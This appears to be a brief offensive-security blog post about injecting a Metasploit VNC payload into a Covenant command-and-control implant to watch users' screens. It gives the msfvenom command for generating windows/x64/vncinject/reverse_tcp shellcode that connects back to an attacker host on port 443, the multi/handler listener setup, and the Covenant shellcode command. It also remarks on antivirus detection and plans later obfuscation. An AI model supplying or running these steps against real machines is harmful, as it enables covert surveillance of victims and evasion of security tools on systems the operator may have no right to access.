# Injecting VNC into covenant Cobalt strike has this neat feature where you can start a tightvnc server and spy on users. You can do this with meterpreter https://www.hackingarticles.in/capture-vnc-session-remote-pc-using-msfvenom/ but meterpreter payloads tend to flag av. A fun thing I discovered is you can also inject this same shellcode into Covenant to do this. ``` msfvenom -p windows/x64/vncinject/reverse_tcp LHOST=10.10.14.X LPORT=443 -f hex ``` Setup a listener ``` use multi/handler set LHOST 10.10.14.X set LPORT 443 set payload windows/x64/vncinject/reverse_tcp exploit ``` Copy and paste the hex string into covenant ``` shellcode HEXSTRINGHERE ``` Sadly even the dll built into cobalt strike is starting to get flagged by av. https://github.com/rsmudge/vncdll https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/modules/payloads/stages/windows/x64/vncinject.rb https://github.com/rapid7/metasploit-framework/tree/76954957c740525cff2db5a60bcf936b4ee06c42/external/source/vncdll/winvnc I'm gonna have to leave obfuscating that for a different day.